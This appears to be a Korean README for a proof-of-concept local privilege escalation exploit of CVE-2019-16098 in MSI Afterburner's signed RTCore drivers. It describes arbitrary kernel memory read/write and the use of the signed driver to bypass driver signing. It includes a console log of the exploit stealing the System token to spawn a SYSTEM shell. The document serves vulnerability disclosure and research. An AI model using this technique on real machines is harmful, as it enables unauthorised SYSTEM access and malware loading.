
CVE-2019-16098용 로컬 권한 상승 PoC 익스플로잇
Micro-Star MSI Afterburner 4.6.2.15658 (일명 RTCore64.sys 및 RTCore32.sys)의 드라이버는 인증된 모든 사용자가 임의의 메모리, I/O 포트 및 MSR을 읽고 쓸 수 있도록 허용합니다. 이는 권한 상승, 높은 권한 하의 코드 실행 및 정보 공개에 악용될 수 있습니다. 이 서명된 드라이버는 또한 Microsoft 드라이버 서명 정책을 우회하여 악성 코드를 배포하는 데 사용될 수 있습니다.
더 많은 업데이트는 CVE-2019-16098를 방문하세요.
경고: Windows 10 x64 버전 1903 오프셋이 하드코딩되어 있습니다!
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
Barakat
C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
SYSTEM
C:\Users\Barakat\source\repos\CVE-2019-16098>